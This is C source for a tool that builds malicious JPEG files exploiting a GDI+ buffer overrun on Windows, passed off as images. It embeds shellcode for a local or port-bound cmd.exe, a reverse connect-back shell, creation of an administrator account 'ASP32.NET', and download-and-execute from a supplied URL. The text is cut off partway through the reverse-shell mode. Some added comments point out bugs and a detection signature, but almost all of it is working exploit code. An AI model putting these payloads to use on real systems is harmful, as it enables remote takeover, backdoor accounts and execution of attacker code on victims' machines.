"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0"; 


//It will create a new user account with the username="ASP32.NET"
// and password of "ASP" and add it to the local group "Администраторы"
// Modified by ZXroot for using in XP SP 1: Russian Edition
char shellcode3[]=
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x41\x53\x50"
"\x33\x32\x2e\x4e\x45\x54\x20\x41\x53\x50\x20\x2f\x41\x44\x44\x20"
"\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75"
"\x70\x20\xC0\xE4\xEC\xE8\xED\xE8\xF1\xF2\xF0\xE0\xF2\xEE\xF0\xFB"
"\x20\x41\x53\x50\x33\x32\x2e\x4e\x45\x54\x20\x2f\x41\x44\x44\x00";


//connect back to a user defined [ip] and [port]
unsigned char shellcode4[] = 
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57"
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89"
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59"
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00"
"\x01\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59"
"\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac"
"\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66"
"\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c"
"\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51"
"\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89"
"\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff"
"\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31"
"\xdb\x53\xff\xd0";

//donwload from http
char shellcode5[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";



//add other shellcodes that you need here :)
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";

char setNOPs1[]=
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char setNOPs2[]=
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char header2[]=
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68"
;

/*
 * Print the tool's banner to stdout. Output only: takes nothing, returns
 * nothing. The same six lines open show_usage().
 */
void show()
{
	static const char *const banner[] = {
		"_____________________________________________________________________\n\n",
		"                 .:[Sacred Desciples of Doom]:.                      \n",
		"  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru>  \n",
		"               Greets to FoToZ who found the bug                     \n",
		"           These Exploit will build malicious JPG File               \n\n",
		"_____________________________________________________________________\n\n",
	};
	size_t k;

	/* no format directives in any line, so fputs is byte-equivalent to printf */
	for (k = 0; k < sizeof banner / sizeof banner[0]; k++) {
		fputs(banner[k], stdout);
	}
}

/*
 * Print the banner followed by the command-line help, then end the process
 * with exit status 1. `s` is argv[0] and is echoed into the usage lines.
 * Never returns.
 */
void show_usage(char s[255])
{
	static const char *const banner[] = {
		"_____________________________________________________________________\n\n",
		"                 .:[Sacred Desciples of Doom]:.                      \n",
		"  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru>  \n",
		"               Greets to FoToZ who found the bug                     \n",
		"           These Exploit will build malicious JPG File               \n\n",
		"_____________________________________________________________________\n\n",
		"  Usage:                                                              \n",
	};
	size_t k;

	for (k = 0; k < sizeof banner / sizeof banner[0]; k++) {
		fputs(banner[k], stdout);
	}

	/* lines that embed the program name */
	printf("\t%s 1: For lounching a local cmd.exe (not bound to the net)\n", s);
	printf("\t%s 2 [port]: For lounching cmd.exe on defined [port]\n", s);
	printf("\t%s 3: For creating a new user account\n", s);
	fputs("\twith the username=\"ASP32.NET\"\n", stdout);
	fputs("\tand password=\"ASP\"and add it to the local group \"Administrators\"\n", stdout);
	printf("\t%s 4 [ip] [port]: For making a conection to a defined [ip]\n", s);
	fputs("\tand on defined [port] and bind cmd.exe on it\n", stdout);
	printf("\t%s 5 [http]: For downloading and then executing a file\n", s);

	exit(1);
}

/*
 * Writes one crafted JPEG under .\Crypto\ according to argv[1]:
 *   1 -> Crypto1.jpg carrying shellcode1 (local cmd.exe)
 *   2 -> Crypto2.jpg carrying shellcode2, listen port from argv[2]
 *   3 -> Crypto3.jpg carrying shellcode3 (adds the "ASP32.NET" account)
 *   4 -> Crypto2.jpg (same name as mode 2) carrying shellcode4,
 *        argv[2] = ip, argv[3] = port
 *   5 -> Crypto5.jpg carrying shellcode5 plus the URL given in argv[2]
 * Every image has the same skeleton: header1 (which, per the comment at the
 * top of the file, contains the FF FE 00 01 COM segment the GDI+ bug tripped
 * on), setNOPs1, header2, 0x90 padding up to file offset 0x63c, the
 * payload, more 0x90 padding, setNOPs2, and a trailing FF D9 (EOI) marker --
 * nominally a 0x1002-byte file. The five modes are independent `if`s rather
 * than an else-if chain, and argv[2]/argv[3] are dereferenced without any
 * argc check beyond `argc < 2`.
 *
 * Reviewer notes: the tool only targets the single unpatched build named in
 * the file header, so its value today is as a sample. For a defender the
 * useful detail is structural: a COM segment whose length field is 0x0001
 * is invalid JPEG and is what a scanner should key on. The FF D9 scan in
 * each mode reads two bytes at a time through an unaligned unsigned short*
 * (undefined behaviour in C, tolerated by x86 MSVC). fcloseall() is an MSVC
 * CRT extension; mkdir() is the <direct.h> one; its result is ignored.
 */
int main(int argc, char *argv[])
{

FILE *fout;
unsigned int i=0,j=0;
unsigned short port=31337;
unsigned long ip;
WSADATA wsa; 
 


// Leftover debug print (no newline) of sizeof(shellcode5) before the usage.
if (argc < 2) { printf("%d",sizeof(shellcode5));
show_usage(argv[0]);
exit(1);
}

//pop up cmd.exe
if (atoi(argv[1]) == 1) 
{
 show();
         mkdir("Crypto");
 fout=fopen("Crypto\\Crypto1.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}



// Warn if the payload contains the byte pair FF D9 (JPEG End Of Image,
// read little-endian as 0xD9FF), which would cut the image short.
for(i=0;i<sizeof(shellcode1)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode1[i] ) 
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode1)-1);

// j = number of bytes the three header loops below will write
// (each sizeof counts a terminating NUL, hence the -3).
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

// Pad with 0x90 to file offset 0x63c, write the payload, pad again so that
// setNOPs2 ends exactly at 0x1000, then append the EOI marker.
for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode1[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

// fprintf with a %-free format: emits exactly the two bytes FF D9.
fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

// MSVC CRT: closes every open stream; there is no matching fclose(fout).
fcloseall();
}

//bind cmd.exe on a [port]
if ((atoi(argv[1]) == 2)) 
{
 show();
         mkdir("Crypto");
 fout=fopen("Crypto\\Crypto2.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}

// lets initialize the socket library, couse we use htons function 
if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
printf("We got a problem ... Winsock didn't initialize!!\n");
exit(1);
}

// argc is not re-checked: "2" without a port reads argv[2] == NULL.
// atoi() truncates silently into the unsigned short.
port = atoi(argv[2]);
SET_PORTBIND_PORT(shellcode2, htons(port));

for(i=0;i<sizeof(shellcode2)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode2[i] ) 
printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n");

printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode2)-1);

// Same file layout as mode 1 (see the comments there).
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode2[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
WSACleanup();
}

//Create User "ASP32.NET"
if (atoi(argv[1]) == 3) 
{
show(); 
mkdir("Crypto");
 fout=fopen("Crypto\\Crypto3.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}



for(i=0;i<sizeof(shellcode3)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode3[i] ) 
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode3)-1);

// Same file layout as mode 1 (see the comments there).
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode3[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
}

//reverse connect back
if (atoi(argv[1]) == 4)
{
 show();
         mkdir("Crypto");
 // Same output name as mode 2: running 4 after 2 overwrites Crypto2.jpg.
 fout=fopen("Crypto\\Crypto2.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}

// let's initialize the socket library, couse we use htons function 
if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
printf("We got a problem ... Winsock didn't initialize!!\n");
exit(1);
}

// argv[2] and argv[3] are read without an argc check; inet_addr() failure
// (INADDR_NONE) is not detected.
ip = inet_addr(argv[2]);
port = atoi(argv[3]);
SET_CONNECTBACK_IP(shellcode4, ip);
SET_CONNECTBACK_PORT(shellcode4, htons(port));

for(i=0;i<sizeof(shellcode4)-1;i++)
